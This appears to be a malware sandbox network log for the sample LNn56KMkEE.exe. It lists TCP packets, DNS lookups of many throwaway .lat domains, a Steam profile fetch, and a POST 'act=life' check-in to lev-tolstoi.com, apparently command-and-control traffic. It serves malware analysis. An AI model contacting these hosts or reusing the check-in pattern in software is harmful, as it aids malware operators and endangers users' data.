                                                                                                                                                                                                                                              Dec 23, 2024 09:06:39.570755959 CET49730443192.168.2.4104.102.49.254
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:39.570784092 CET44349730104.102.49.254192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:39.571223021 CET44349730104.102.49.254192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:39.610824108 CET49730443192.168.2.4104.102.49.254
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:39.676143885 CET49730443192.168.2.4104.102.49.254
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:39.723337889 CET44349730104.102.49.254192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:40.318363905 CET44349730104.102.49.254192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:40.318396091 CET44349730104.102.49.254192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:40.318439960 CET44349730104.102.49.254192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:40.318443060 CET49730443192.168.2.4104.102.49.254
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:40.318461895 CET44349730104.102.49.254192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:40.318497896 CET44349730104.102.49.254192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:40.318519115 CET44349730104.102.49.254192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:40.318543911 CET49730443192.168.2.4104.102.49.254
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:40.318543911 CET49730443192.168.2.4104.102.49.254
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:40.318543911 CET49730443192.168.2.4104.102.49.254
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:40.318543911 CET49730443192.168.2.4104.102.49.254
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:40.318569899 CET49730443192.168.2.4104.102.49.254
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:40.519197941 CET44349730104.102.49.254192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:40.519275904 CET44349730104.102.49.254192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:40.519364119 CET49730443192.168.2.4104.102.49.254
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:40.519413948 CET44349730104.102.49.254192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:40.519443035 CET49730443192.168.2.4104.102.49.254
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:40.519475937 CET49730443192.168.2.4104.102.49.254
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:40.526921988 CET44349730104.102.49.254192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:40.527040005 CET49730443192.168.2.4104.102.49.254
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:40.534351110 CET44349730104.102.49.254192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:40.534413099 CET49730443192.168.2.4104.102.49.254
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:40.534430027 CET44349730104.102.49.254192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:40.534507990 CET44349730104.102.49.254192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:40.534607887 CET49730443192.168.2.4104.102.49.254
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:40.535602093 CET49730443192.168.2.4104.102.49.254
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:40.535639048 CET44349730104.102.49.254192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:40.682985067 CET49731443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:40.683028936 CET44349731104.21.66.86192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:40.683110952 CET49731443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:40.683701992 CET49731443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:40.683716059 CET44349731104.21.66.86192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:41.908202887 CET44349731104.21.66.86192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:41.908305883 CET49731443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:41.911653042 CET49731443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:41.911664009 CET44349731104.21.66.86192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:41.912080050 CET44349731104.21.66.86192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:41.913372993 CET49731443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:41.913403034 CET49731443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:41.913455009 CET44349731104.21.66.86192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:42.631866932 CET44349731104.21.66.86192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:42.631987095 CET44349731104.21.66.86192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:42.632119894 CET49731443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:42.946185112 CET49731443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:42.946218014 CET44349731104.21.66.86192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:42.995657921 CET49732443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:42.995691061 CET44349732104.21.66.86192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:42.995748043 CET49732443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:42.996376038 CET49732443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:42.996387959 CET44349732104.21.66.86192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:44.206003904 CET44349732104.21.66.86192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:44.206099987 CET49732443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:44.207549095 CET49732443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:44.207561016 CET44349732104.21.66.86192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:44.207809925 CET44349732104.21.66.86192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:44.211632013 CET49732443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:44.211647034 CET49732443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:44.211704969 CET44349732104.21.66.86192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:44.975039005 CET44349732104.21.66.86192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:44.975119114 CET44349732104.21.66.86192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:44.975164890 CET49732443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:44.975178957 CET44349732104.21.66.86192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:44.976228952 CET44349732104.21.66.86192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:44.976265907 CET49732443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:44.976274967 CET44349732104.21.66.86192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:44.977196932 CET44349732104.21.66.86192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:44.977230072 CET44349732104.21.66.86192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:44.977230072 CET49732443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:44.977242947 CET44349732104.21.66.86192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:44.977272987 CET49732443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:44.983081102 CET44349732104.21.66.86192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:44.993807077 CET44349732104.21.66.86192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:44.993891001 CET49732443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:44.993901014 CET44349732104.21.66.86192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:45.048324108 CET49732443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:45.048329115 CET44349732104.21.66.86192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:45.095174074 CET49732443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:45.095182896 CET44349732104.21.66.86192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:45.142062902 CET49732443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:45.166901112 CET44349732104.21.66.86192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:45.171025038 CET44349732104.21.66.86192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:45.171065092 CET44349732104.21.66.86192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:45.171083927 CET49732443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:45.171096087 CET44349732104.21.66.86192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:45.171148062 CET49732443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:45.171154976 CET44349732104.21.66.86192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:45.171174049 CET44349732104.21.66.86192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:45.171221018 CET49732443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:45.171374083 CET49732443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:45.171389103 CET44349732104.21.66.86192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:45.171411991 CET49732443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:45.171418905 CET44349732104.21.66.86192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:45.346935987 CET49733443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:45.347004890 CET44349733104.21.66.86192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:45.347071886 CET49733443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:45.347529888 CET49733443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:45.347546101 CET44349733104.21.66.86192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:46.561743975 CET44349733104.21.66.86192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:46.561841965 CET49733443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:46.563323975 CET49733443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:46.563338041 CET44349733104.21.66.86192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:46.563599110 CET44349733104.21.66.86192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:46.564860106 CET49733443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:46.565072060 CET49733443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:46.565098047 CET44349733104.21.66.86192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:46.565172911 CET49733443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:46.565179110 CET44349733104.21.66.86192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:47.501686096 CET44349733104.21.66.86192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:47.501780033 CET44349733104.21.66.86192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:47.501925945 CET49733443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:47.502223015 CET49733443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:47.502245903 CET44349733104.21.66.86192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:47.600240946 CET49734443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:47.600291014 CET44349734104.21.66.86192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:47.600400925 CET49734443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:47.600878954 CET49734443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:47.600893974 CET44349734104.21.66.86192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:48.814260960 CET44349734104.21.66.86192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:48.814359903 CET49734443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:48.816399097 CET49734443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:48.816409111 CET44349734104.21.66.86192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:48.816656113 CET44349734104.21.66.86192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:48.818150043 CET49734443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:48.818322897 CET49734443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:48.818363905 CET44349734104.21.66.86192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:49.473807096 CET44349734104.21.66.86192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:49.474112988 CET44349734104.21.66.86192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:49.474210024 CET49734443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:49.474376917 CET49734443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:49.474395990 CET44349734104.21.66.86192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:49.686100006 CET49735443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:49.686153889 CET44349735104.21.66.86192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:49.686338902 CET49735443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:49.686667919 CET49735443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:49.686681986 CET44349735104.21.66.86192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:50.908915043 CET44349735104.21.66.86192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:50.909006119 CET49735443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:50.911062956 CET49735443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:50.911073923 CET44349735104.21.66.86192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:50.911358118 CET44349735104.21.66.86192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:50.912727118 CET49735443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:50.912868977 CET49735443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:50.912904978 CET44349735104.21.66.86192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:50.913032055 CET49735443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:50.913039923 CET44349735104.21.66.86192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:52.030400991 CET44349735104.21.66.86192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:52.030504942 CET44349735104.21.66.86192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:52.030558109 CET49735443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:52.031286001 CET49735443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:52.031307936 CET44349735104.21.66.86192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:52.448489904 CET49737443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:52.448537111 CET44349737104.21.66.86192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:52.448611021 CET49737443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:52.449028969 CET49737443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:52.449040890 CET44349737104.21.66.86192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:53.676656961 CET44349737104.21.66.86192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:53.676745892 CET49737443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:53.678235054 CET49737443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:53.678250074 CET44349737104.21.66.86192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:53.678507090 CET44349737104.21.66.86192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:53.680022001 CET49737443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:53.680119991 CET49737443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:53.680129051 CET44349737104.21.66.86192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:54.496144056 CET44349737104.21.66.86192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:54.496237040 CET44349737104.21.66.86192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:54.496320963 CET49737443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:54.504262924 CET49737443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:54.504308939 CET44349737104.21.66.86192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:55.152537107 CET49739443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:55.152581930 CET44349739104.21.66.86192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:55.152641058 CET49739443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:55.153014898 CET49739443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:55.153028011 CET44349739104.21.66.86192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:56.370151997 CET44349739104.21.66.86192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:56.370335102 CET49739443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:56.371898890 CET49739443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:56.371911049 CET44349739104.21.66.86192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:56.372212887 CET44349739104.21.66.86192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:56.376200914 CET49739443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:56.377208948 CET49739443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:56.377260923 CET44349739104.21.66.86192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:56.377518892 CET49739443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:56.377554893 CET44349739104.21.66.86192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:56.377670050 CET49739443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:56.377711058 CET44349739104.21.66.86192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:56.377835989 CET49739443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:56.377863884 CET44349739104.21.66.86192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:56.378017902 CET49739443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:56.378050089 CET44349739104.21.66.86192.168.2.4
                                                                                                                                                                                                                                              Dec 23, 2024 09:06:56.378196001 CET49739443192.168.2.4104.21.66.86
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 23, 2024 09:06:36.516877890 CET | 192.168.2.4 | 1.1.1.1 | 0x20fa | Standard query (0) | sweepyribs.lat | A (IP address) | IN (0x0001) | false
Dec 23, 2024 09:06:36.672146082 CET | 192.168.2.4 | 1.1.1.1 | 0xa060 | Standard query (0) | grannyejh.lat | A (IP address) | IN (0x0001) | false
Dec 23, 2024 09:06:36.812542915 CET | 192.168.2.4 | 1.1.1.1 | 0x23d9 | Standard query (0) | discokeyus.lat | A (IP address) | IN (0x0001) | false
Dec 23, 2024 09:06:36.955604076 CET | 192.168.2.4 | 1.1.1.1 | 0x727a | Standard query (0) | necklacebudi.lat | A (IP address) | IN (0x0001) | false
Dec 23, 2024 09:06:37.105932951 CET | 192.168.2.4 | 1.1.1.1 | 0xd3c6 | Standard query (0) | energyaffai.lat | A (IP address) | IN (0x0001) | false
Dec 23, 2024 09:06:37.263223886 CET | 192.168.2.4 | 1.1.1.1 | 0xb1ac | Standard query (0) | aspecteirs.lat | A (IP address) | IN (0x0001) | false
Dec 23, 2024 09:06:37.470705032 CET | 192.168.2.4 | 1.1.1.1 | 0x3ef5 | Standard query (0) | sustainskelet.lat | A (IP address) | IN (0x0001) | false
Dec 23, 2024 09:06:37.668445110 CET | 192.168.2.4 | 1.1.1.1 | 0x9fb4 | Standard query (0) | crosshuaht.lat | A (IP address) | IN (0x0001) | false
Dec 23, 2024 09:06:37.810523987 CET | 192.168.2.4 | 1.1.1.1 | 0x143d | Standard query (0) | rapeflowwj.lat | A (IP address) | IN (0x0001) | false
Dec 23, 2024 09:06:37.951786995 CET | 192.168.2.4 | 1.1.1.1 | 0x6661 | Standard query (0) | steamcommunity.com | A (IP address) | IN (0x0001) | false
Dec 23, 2024 09:06:40.539886951 CET | 192.168.2.4 | 1.1.1.1 | 0xa165 | Standard query (0) | lev-tolstoi.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 23, 2024 09:06:36.654759884 CET | 1.1.1.1 | 192.168.2.4 | 0x20fa | Name error (3) | sweepyribs.lat | none | none | A (IP address) | IN (0x0001) | false
Dec 23, 2024 09:06:36.809632063 CET | 1.1.1.1 | 192.168.2.4 | 0xa060 | Name error (3) | grannyejh.lat | none | none | A (IP address) | IN (0x0001) | false
Dec 23, 2024 09:06:36.952377081 CET | 1.1.1.1 | 192.168.2.4 | 0x23d9 | Name error (3) | discokeyus.lat | none | none | A (IP address) | IN (0x0001) | false
Dec 23, 2024 09:06:37.093200922 CET | 1.1.1.1 | 192.168.2.4 | 0x727a | Name error (3) | necklacebudi.lat | none | none | A (IP address) | IN (0x0001) | false
Dec 23, 2024 09:06:37.244659901 CET | 1.1.1.1 | 192.168.2.4 | 0xd3c6 | Name error (3) | energyaffai.lat | none | none | A (IP address) | IN (0x0001) | false
Dec 23, 2024 09:06:37.402496099 CET | 1.1.1.1 | 192.168.2.4 | 0xb1ac | Name error (3) | aspecteirs.lat | none | none | A (IP address) | IN (0x0001) | false
Dec 23, 2024 09:06:37.663539886 CET | 1.1.1.1 | 192.168.2.4 | 0x3ef5 | Name error (3) | sustainskelet.lat | none | none | A (IP address) | IN (0x0001) | false
Dec 23, 2024 09:06:37.806524992 CET | 1.1.1.1 | 192.168.2.4 | 0x9fb4 | Name error (3) | crosshuaht.lat | none | none | A (IP address) | IN (0x0001) | false
Dec 23, 2024 09:06:37.948013067 CET | 1.1.1.1 | 192.168.2.4 | 0x143d | Name error (3) | rapeflowwj.lat | none | none | A (IP address) | IN (0x0001) | false
Dec 23, 2024 09:06:38.164707899 CET | 1.1.1.1 | 192.168.2.4 | 0x6661 | No error (0) | steamcommunity.com |  | 104.102.49.254 | A (IP address) | IN (0x0001) | false
Dec 23, 2024 09:06:40.681710958 CET | 1.1.1.1 | 192.168.2.4 | 0xa165 | No error (0) | lev-tolstoi.com |  | 104.21.66.86 | A (IP address) | IN (0x0001) | false
Dec 23, 2024 09:06:40.681710958 CET | 1.1.1.1 | 192.168.2.4 | 0xa165 | No error (0) | lev-tolstoi.com |  | 172.67.157.254 | A (IP address) | IN (0x0001) | false
• steamcommunity.com
• lev-tolstoi.com

Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49730 | 104.102.49.254 | 443 | 6948 | C:\Users\user\Desktop\LNn56KMkEE.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-23 08:06:39 UTC | 219 | OUT | GET /profiles/76561199724331900 HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Host: steamcommunity.com
2024-12-23 08:06:40 UTC | 1905 | IN | HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=UTF-8
Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache
Date: Mon, 23 Dec 2024 08:06:40 GMT
Content-Length: 35121
Connection: close
Set-Cookie: sessionid=060b0cfa47d5459e9b8e163b; Path=/; Secure; SameSite=None
Set-Cookie: steamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=None


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49731 | 104.21.66.86 | 443 | 6948 | C:\Users\user\Desktop\LNn56KMkEE.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-23 08:06:41 UTC | 262 | OUT | POST /api HTTP/1.1
                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                              Content-Length: 8
                                                                                                                                                                                                                                              Host: lev-tolstoi.com
2024-12-23 08:06:41 UTC | 8 | OUT | Data Raw: 61 63 74 3d 6c 69 66 65
Data Ascii: act=life
2024-12-23 08:06:42 UTC | 1119 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Mon, 23 Dec 2024 08:06:42 GMT
                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Set-Cookie: PHPSESSID=h52ejddaf1bo3sehlmscdqja76; expires=Fri, 18 Apr 2025 01:53:21 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                              vary: accept-encoding
